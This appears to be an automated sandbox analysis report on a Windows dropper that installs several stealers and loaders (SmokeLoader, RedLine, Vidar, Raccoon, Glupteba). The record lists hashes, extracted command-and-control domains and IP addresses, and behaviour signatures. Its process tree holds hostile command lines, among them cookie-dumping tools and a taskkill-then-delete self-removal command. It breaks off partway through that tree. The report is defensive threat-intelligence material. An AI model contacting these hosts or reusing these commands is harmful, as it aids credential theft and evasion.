Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    316s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    29-07-2021 21:43

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

forinstalls

C2

77.220.213.35:52349

Extracted

Family

redline

Botnet

5k_ABSOLUTE

C2

45.14.49.117:14251

Extracted

Family

redline

Botnet

sel22

C2

salkefard.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

b2f4d9fe1388d8fb99e44879db3e1a785afcac9d

Attributes
  • url4cnc

    https://t.me/uidsoyaada

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • CustAttr .NET packer 1 IoCs

    Detects CustAttr .NET packer in memory.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1192
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2764
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Modifies registry class
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2492
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1820
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1232
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1056
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:788
                    • C:\Users\Admin\AppData\Roaming\cbsafjc
                      C:\Users\Admin\AppData\Roaming\cbsafjc
                      2⤵
                        PID:6236
                      • C:\Users\Admin\AppData\Roaming\cfsafjc
                        C:\Users\Admin\AppData\Roaming\cfsafjc
                        2⤵
                          PID:6436
                        • C:\Users\Admin\AppData\Roaming\vusafjc
                          C:\Users\Admin\AppData\Roaming\vusafjc
                          2⤵
                            PID:6556
                            • C:\Users\Admin\AppData\Roaming\vusafjc
                              C:\Users\Admin\AppData\Roaming\vusafjc
                              3⤵
                                PID:5232
                            • C:\Users\Admin\AppData\Roaming\cfsafjc
                              C:\Users\Admin\AppData\Roaming\cfsafjc
                              2⤵
                                PID:6820
                              • C:\Users\Admin\AppData\Roaming\vusafjc
                                C:\Users\Admin\AppData\Roaming\vusafjc
                                2⤵
                                  PID:5496
                                  • C:\Users\Admin\AppData\Roaming\vusafjc
                                    C:\Users\Admin\AppData\Roaming\vusafjc
                                    3⤵
                                      PID:4148
                                  • C:\Users\Admin\AppData\Roaming\cbsafjc
                                    C:\Users\Admin\AppData\Roaming\cbsafjc
                                    2⤵
                                      PID:5940
                                    • C:\Users\Admin\AppData\Roaming\cfsafjc
                                      C:\Users\Admin\AppData\Roaming\cfsafjc
                                      2⤵
                                        PID:1084
                                      • C:\Users\Admin\AppData\Roaming\vusafjc
                                        C:\Users\Admin\AppData\Roaming\vusafjc
                                        2⤵
                                          PID:6276
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                        1⤵
                                          PID:1004
                                        • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                                          "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                                          1⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3128
                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:1872
                                            • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\setup_install.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zS0571D264\setup_install.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:2636
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:3640
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_3.exe
                                                  sonia_3.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:3836
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 1660
                                                    6⤵
                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                    • Program crash
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4332
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4084
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_4.exe
                                                  sonia_4.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3788
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 492
                                                4⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3128
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                4⤵
                                                  PID:1300
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1524
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3476
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3724
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1996
                                          • \??\c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                            1⤵
                                            • Suspicious use of SetThreadContext
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:3944
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                              2⤵
                                              • Checks processor information in registry
                                              • Modifies data under HKEY_USERS
                                              • Modifies registry class
                                              PID:2072
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                              2⤵
                                              • Drops file in System32 directory
                                              • Checks processor information in registry
                                              • Modifies data under HKEY_USERS
                                              • Modifies registry class
                                              PID:5000
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_6.exe
                                            sonia_6.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious use of WriteProcessMemory
                                            PID:3180
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:3772
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:2460
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                                PID:1604
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                2⤵
                                                  PID:6596
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_2.exe
                                                sonia_2.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:2068
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0571D264\sonia_5.exe
                                                sonia_5.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:2456
                                                • C:\Users\Admin\Documents\7Gmr_CThsvwBWpBDEP5BRfbr.exe
                                                  "C:\Users\Admin\Documents\7Gmr_CThsvwBWpBDEP5BRfbr.exe"
                                                  2⤵
                                                    PID:4748
                                                    • C:\Users\Admin\Documents\7Gmr_CThsvwBWpBDEP5BRfbr.exe
                                                      "C:\Users\Admin\Documents\7Gmr_CThsvwBWpBDEP5BRfbr.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4192
                                                  • C:\Users\Admin\Documents\FnBXOm1xiMZEcEs18lrcCHK3.exe
                                                    "C:\Users\Admin\Documents\FnBXOm1xiMZEcEs18lrcCHK3.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4796
                                                    • C:\Users\Admin\AppData\Roaming\2567657.exe
                                                      "C:\Users\Admin\AppData\Roaming\2567657.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:4668
                                                    • C:\Users\Admin\AppData\Roaming\6554449.exe
                                                      "C:\Users\Admin\AppData\Roaming\6554449.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:2132
                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:5800
                                                    • C:\Users\Admin\AppData\Roaming\4687624.exe
                                                      "C:\Users\Admin\AppData\Roaming\4687624.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:5044
                                                  • C:\Users\Admin\Documents\L0oYZnIZafIxKhaZ70Y_cQlX.exe
                                                    "C:\Users\Admin\Documents\L0oYZnIZafIxKhaZ70Y_cQlX.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4836
                                                    • C:\Users\Admin\Documents\L0oYZnIZafIxKhaZ70Y_cQlX.exe
                                                      C:\Users\Admin\Documents\L0oYZnIZafIxKhaZ70Y_cQlX.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5232
                                                  • C:\Users\Admin\Documents\pdd8VxQ1C7FmNqYYiW3sti3w.exe
                                                    "C:\Users\Admin\Documents\pdd8VxQ1C7FmNqYYiW3sti3w.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4816
                                                    • C:\Users\Admin\Documents\pdd8VxQ1C7FmNqYYiW3sti3w.exe
                                                      C:\Users\Admin\Documents\pdd8VxQ1C7FmNqYYiW3sti3w.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:4496
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 160
                                                        4⤵
                                                        • Program crash
                                                        PID:5012
                                                  • C:\Users\Admin\Documents\q_l9qkE1xtDhZKXh2fBDZ7KD.exe
                                                    "C:\Users\Admin\Documents\q_l9qkE1xtDhZKXh2fBDZ7KD.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4920
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      3⤵
                                                        PID:5668
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          4⤵
                                                          • Kills process with taskkill
                                                          PID:5876
                                                    • C:\Users\Admin\Documents\qT1QlcaDBa24CMTQmMf4kAk0.exe
                                                      "C:\Users\Admin\Documents\qT1QlcaDBa24CMTQmMf4kAk0.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5004
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        3⤵
                                                          PID:4824
                                                      • C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe
                                                        "C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4992
                                                        • C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe
                                                          "C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe"
                                                          3⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4772
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                            4⤵
                                                              PID:748
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                5⤵
                                                                • Checks processor information in registry
                                                                PID:4080
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                              4⤵
                                                              • Enumerates system info in registry
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5268
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa95ce4f50,0x7ffa95ce4f60,0x7ffa95ce4f70
                                                                5⤵
                                                                  PID:5596
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1528 /prefetch:2
                                                                  5⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4532
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:8
                                                                  5⤵
                                                                    PID:5700
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:8
                                                                    5⤵
                                                                      PID:4320
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
                                                                      5⤵
                                                                        PID:1852
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:1
                                                                        5⤵
                                                                          PID:5340
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                                                          5⤵
                                                                            PID:5016
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                            5⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4828
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                                                                            5⤵
                                                                              PID:1548
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                                                              5⤵
                                                                                PID:2096
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 /prefetch:8
                                                                                5⤵
                                                                                  PID:6528
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
                                                                                  5⤵
                                                                                    PID:7076
                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                    5⤵
                                                                                      PID:7068
                                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff711d0a890,0x7ff711d0a8a0,0x7ff711d0a8b0
                                                                                        6⤵
                                                                                          PID:7132
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
                                                                                        5⤵
                                                                                          PID:6500
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
                                                                                          5⤵
                                                                                            PID:6788
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1516,12945976069343834112,17313154638651107909,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3112 /prefetch:2
                                                                                            5⤵
                                                                                              PID:6540
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /C taskkill /F /PID 4772 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\7J1dqXP5K4l7peOE5al4p_Fk.exe"
                                                                                            4⤵
                                                                                              PID:5060
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /F /PID 4772
                                                                                                5⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:5736
                                                                                            • C:\Windows\SysWOW64\cmd.exe
